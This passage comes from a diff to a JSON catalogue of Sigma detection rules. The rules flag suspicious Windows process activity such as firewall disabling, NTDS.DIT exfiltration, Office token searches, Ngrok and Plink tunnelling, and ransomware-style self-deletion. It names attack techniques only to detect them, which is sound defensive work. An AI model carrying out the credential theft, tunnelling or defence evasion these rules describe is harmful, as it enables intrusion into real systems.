"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", + "https://attack.mitre.org/software/S0108/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.007", + "attack.s0108" + ], + "creation_date": "2019/10/25", + "filename": "proc_creation_win_susp_netsh_dll_persistence.yml", + "author": "Victor Sergeev, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + 
} + }, + { + "description": "Detects netsh commands that turns off the Windows firewall", + "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", + "value": "Firewall Disabled via Netsh", + "meta": { + "refs": [ + "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", + "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004", + "attack.s0108" + ], + "creation_date": "2019/11/01", + "filename": "proc_creation_win_susp_netsh_firewall_disable.yml", + "author": "Fatih Sirin", + "level": "medium", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of client32.exe (NetSupport RAT) from an unsual location (outisde of 'C:\\Program Files')", + "uuid": "37e8d358-6408-4853-82f4-98333fca7014", + "value": "Execution of NetSupport RAT From Unusual Location", + "meta": { + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/19", + "filename": "proc_creation_win_susp_netsupport_rat_exec_location.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through 
information discovery of remote systems", + "uuid": "a29c1813-ab1f-4dde-b489-330b952e91ae", + "value": "Suspicious Network Command", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ], + "creation_date": "2021/12/07", + "filename": "proc_creation_win_susp_network_command.yml", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "level": "low", + "falsepositive": [ + "Administrator, hotline ask to user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", + "value": "Suspicious Listing of Network Connections", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_listing_connections.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ], + "creation_date": "2021/12/10", + "filename": "proc_creation_win_susp_network_listing_connections.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of Net.exe, whether suspicious or benign.", + "uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", + 
"value": "Net.exe Execution", + "meta": { + "refs": [ + "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", + "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", + "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", + "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1007", + "attack.t1049", + "attack.t1018", + "attack.t1135", + "attack.t1201", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1087.001", + "attack.t1087.002", + "attack.lateral_movement", + "attack.t1021.002", + "attack.s0039" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_net_execution.yml", + "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", + "level": "low", + "falsepositive": [ + "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects net use command combo which executes files from WebDAV server; seen in malicious LNK files", + "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "value": "Suspicious Net Use Command Combo", + "meta": { + "refs": [ + "https://twitter.com/ShadowChasing1/status/1552595370961944576", + "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/09/01", + "filename": "proc_creation_win_susp_net_use.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a when net.exe is called with a password in the command line", + "uuid": "d4498716-1d52-438f-8084-4a603157d131", + "value": "Password Provided In Command Line Of Net.exe", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use_password_plaintext.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/09", + "filename": "proc_creation_win_susp_net_use_password_plaintext.yml", + "author": "Tim Shelton (HAWK.IO)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "uuid": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "value": "New Kernel Driver Via SC.EXE", + "meta": { + "refs": [ + "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/14", + "filename": "proc_creation_win_susp_new_kernel_driver_via_sc.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Rare legitimate installation of kernel drivers via sc.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "uuid": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "value": "Suspicious New Service Creation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/14", + "filename": "proc_creation_win_susp_new_service_creation.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "value": "Ngrok Usage", + "meta": { + 
"refs": [ + "https://ngrok.com/docs", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", + "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", + "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", + "https://twitter.com/xorJosh/status/1598646907802451969", + "https://www.softwaretestinghelp.com/how-to-use-ngrok/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ], + "creation_date": "2021/05/14", + "filename": "proc_creation_win_susp_ngrok_pua.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "uuid": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "value": "Suspicious Nmap Execution", + "meta": { + "refs": [ + "https://nmap.org/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nmap.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2021/12/10", + "filename": "proc_creation_win_susp_nmap.yml", + "author": "frack113", + "level": "high", + 
"falsepositive": [ + "Network administrator computer" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "uuid": "c09dad97-1c78-4f71-b127-7edb2b8e491a", + "value": "Execution of Suspicious File Type Extension", + "meta": { + "refs": [ + "https://pentestlaboratories.com/2021/12/08/process-ghosting/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/12/09", + "filename": "proc_creation_win_susp_non_exe_image.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection", + "uuid": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "value": "Suspicious Ntdll Pipe Redirection", + "meta": { + "refs": [ + "https://www.x86matthew.com/view_post?id=ntdll_pipe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/03/05", + "filename": "proc_creation_win_susp_ntdll_type_redirect.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "value": "Suspicious Process Patterns NTDS.DIT Exfil", + "meta": { + "refs": [ + 
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://github.com/zcgonvh/NTDSDumpEx", + "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2022/03/11", + "filename": "proc_creation_win_susp_ntds.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", + "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2022/09/14", + "filename": "proc_creation_win_susp_ntdsutil_usage.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage to restore snapshots", + "Legitimate admin activity" + ], + 
"logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "uuid": "bb76d96b-821c-47cf-944b-7ce377864492", + "value": "Suspicious NTLM Authentication on the Printer Spooler Service", + "meta": { + "refs": [ + "https://twitter.com/med0x2e/status/1520402518685200384", + "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" + ], + "creation_date": "2022/05/04", + "filename": "proc_creation_win_susp_ntlmrelay.yml", + "author": "Elastic (idea), Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "value": "Suspicious NT Resource Kit Auditpol Usage", + "meta": { + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2021/12/18", + "filename": "proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml", + "author": 
"Nasreddine Bencherchali @nas_bench", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", + "uuid": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "value": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", + "https://twitter.com/Hexacorn/status/1187143326673330176", + "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.008" + ], + "creation_date": "2019/10/25", + "filename": "proc_creation_win_susp_odbcconf.yml", + "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate use of odbcconf.exe by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". 
This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", + "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615", + "value": "Suspicious Office Token Search Via CLI", + "meta": { + "refs": [ + "https://mrd0x.com/stealing-tokens-from-office-applications/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ], + "creation_date": "2022/10/25", + "filename": "proc_creation_win_susp_office_token_search.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate command-lines containing the string mentioned in the command-line" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The OpenWith.exe executes other binary", + "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", + "value": "OpenWith.exe Executes Specified Binary", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", + "https://twitter.com/harr0ey/status/991670870384021504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2019/10/12", + "filename": "proc_creation_win_susp_openwith.yml", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "level": "high", + "falsepositive": [ + "Legitimate use of OpenWith.exe by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects EnableUnsafeClientMailRules used for Script Execution from Outlook", + "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", + "value": "Suspicious Execution from Outlook", + "meta": { + "refs": [ + 
"https://github.com/sensepost/ruler", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.t1202" + ], + "creation_date": "2018/12/27", + "filename": "proc_creation_win_susp_outlook.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious program execution in Outlook temp folder", + "uuid": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "value": "Execution in Outlook Temp Folder", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2019/10/01", + "filename": "proc_creation_win_susp_outlook_temp.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "value": "Suspicious Process Parents", + "meta": { + "refs": [ + "https://twitter.com/x86matthew/status/1505476263464607744?s=12", + "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" + ], + "tags": "No established tags", + "creation_date": "2022/03/21", + "filename": "proc_creation_win_susp_parents.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + 
], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", + "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "value": "Conhost Spawned By Suspicious Parent Process", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parent_of_conhost.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/09/28", + "filename": "proc_creation_win_susp_parent_of_conhost.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "value": "PCHunter Usage", + "meta": { + "refs": [ + "http://www.xuetr.com/", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/10", + "filename": "proc_creation_win_susp_pchunter.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + 
"uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", + "value": "Code Execution via Pcwutl.dll", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", + "https://twitter.com/harr0ey/status/989617817849876488", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_susp_pcwutl.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Use of Program Compatibility Troubleshooter Helper" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", + "value": "Execute Code with Pester.bat", + "meta": { + "refs": [ + "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_win_susp_pester.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate use of Pester for writing tests for Powershell scripts and modules" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", + "value": "Execute Code with Pester.bat as Parent", + "meta": { + "refs": [ + "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://twitter.com/_st0pp3r_/status/1560072680887525378", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2022/08/20", + "filename": "proc_creation_win_susp_pester_parent.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of Pester for writing tests for Powershell scripts and modules" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "value": "Suspicious Ping And Del Combination", + "meta": { + "refs": [ + "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2022/11/03", + "filename": "proc_creation_win_susp_ping_del.yml", + "author": "Ilya Krestinichev", + "level": "high", + "falsepositive": [ + "False positive could occur in admin scripts that execute inline" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a ping command that uses a hex encoded IP address", + "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "value": "Ping Hex IP", + 
"meta": { + "refs": [ + "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", + "https://twitter.com/vysecurity/status/977198418354491392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" + ], + "creation_date": "2018/03/23", + "filename": "proc_creation_win_susp_ping_hex_ip.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "uuid": "48a61b29-389f-4032-b317-b30de6b95314", + "value": "Suspicious Plink Port Forwarding", + "meta": { + "refs": [ + "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", + "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" + ], + "creation_date": "2021/01/19", + "filename": "proc_creation_win_susp_plink_port_forward.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity using a remote port forwarding to a local port" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execution of plink to perform data exfiltration and tunneling", + "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "value": "Suspicious Plink Usage RDP Tunneling", + "meta": { + "refs": [ + 
"https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ], + "creation_date": "2022/08/04", + "filename": "proc_creation_win_susp_plink_usage.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", + "uuid": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "value": "Suspicious Powercfg Execution To Change Lock Screen Timeout", + "meta": { + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/11/18", + "filename": "proc_creation_win_susp_powercfg.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "value": "Suspicious PowerShell Encoded Command Patterns", + "meta": { + "refs": [ + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + 